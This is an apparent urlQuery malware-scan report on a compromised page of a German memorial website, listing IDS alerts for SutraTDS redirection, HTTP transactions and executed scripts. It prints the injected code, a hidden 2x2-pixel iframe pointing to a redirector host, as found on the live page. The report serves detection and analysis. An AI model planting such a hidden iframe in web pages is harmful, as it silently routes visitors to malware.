Overview

URLhttp://gedenkstaette-seelower-hoehen.de/flash/trailer.htm
IP82.165.122.133
ASNAS8560 1&1 Internet AG
Location Germany
Report completed2012-11-20 15:53:40 CET
StatusLoading report..
urlQuery Alerts Detected SutraTDS URL pattern


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-20 15:52:33 82.165.122.133 urlQuery Client2ET CURRENT_EVENTS TDS Sutra - page redirecting to a SutraTDS
2012-11-20 15:52:33 82.165.122.133 urlQuery Client1ET CURRENT_EVENTS c3284d malware network iframe
2012-11-20 15:52:34 82.165.122.133 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-20 15:52:32 82.165.122.133 urlQuery Client1MALWARE-CNC TDS Sutra - page redirecting to a SutraTDS


Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 82.165.122.133

Date Alerts / IDS URL IP
2013-01-15 06:35:230 / 2http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm82.165.122.133

Last 6 reports on ASN: AS8560 1&1 Internet AG

Date Alerts / IDS URL IP
2013-02-14 01:20:310 / 0http://www.it-analysis.com/b.php?size=468x60&ts=136079094282.165.196.111
2013-02-14 01:09:430 / 0http://www.rainbowcc.org/74.208.29.232
2013-02-14 00:38:510 / 0http://amefound.org/wp-content/plugins/Airforce-Tongue-Airport/947860/DCCCXXXV/Game/74.208.127.131
2013-02-14 00:19:200 / 0http://www.upcycling.de/qvqvipe/itvwentkxfe7ixr7jum47a9dyptynxk.9pq8yiv3it3212.227.192.145
2013-02-13 23:18:240 / 0http://amefound.org/wp-content/plugins/Airforce-Tongue-Airport/947860/DCCCXXXV/Game/74.208.127.131
2013-02-13 22:59:030 / 0http://74.208.148.3574.208.148.35

Last 1 reports on domain: gedenkstaette-seelower-hoehen.de

Date Alerts / IDS URL IP
2013-01-15 06:35:230 / 2http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm82.165.122.133



JavaScript

Executed Scripts (3)


Executed Evals (0)


Executed Writes (1)

#1 JavaScript::Write (size: 139, repeated: 1) 

<iframe src="http://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>


HTTP Transactions (7)


Request Response 
GET /flash/trailer.htm HTTP/1.1

Host: gedenkstaette-seelower-hoehen.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Tue, 20 Nov 2012 14:52:32 GMT
Server: Apache
Last-Modified: Tue, 22 May 2012 06:31:17 GMT
Etag: &quot;c1f289eb-209-4c09a2a7da943&quot;
Accept-Ranges: bytes
Content-Length: 521
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /flash/mediaplayer.swf HTTP/1.1

Host: gedenkstaette-seelower-hoehen.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm
 
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Date: Tue, 20 Nov 2012 14:52:33 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 16:22:13 GMT
Etag: &quot;c1f289ed-82c6-4579291fd9740&quot;
Accept-Ranges: bytes
Content-Length: 33478
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/xml

Server: Apache
Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT
Etag: &quot;87de33-256-4cd617ed12480&quot;
Accept-Ranges: bytes
Content-Length: 598
Date: Tue, 20 Nov 2012 14:52:34 GMT
Connection: keep-alive
GET /favicon.ico HTTP/1.1

Host: gedenkstaette-seelower-hoehen.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 20 Nov 2012 14:52:34 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: gedenkstaette-seelower-hoehen.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 20 Nov 2012 14:52:37 GMT
Server: Apache
Content-Length: 640
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /flash/seelower_hoehen.flv HTTP/1.1

Host: gedenkstaette-seelower-hoehen.de

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: video/x-flv

Date: Tue, 20 Nov 2012 14:52:34 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 16:57:08 GMT
Etag: &quot;c1f289ee-605e65c-457930edcc100&quot;
Accept-Ranges: bytes
Content-Length: 101049948
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /in.cgi?19 HTTP/1.1

Host: objectcash.in

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gedenkstaette-seelower-hoehen.de/flash/trailer.htm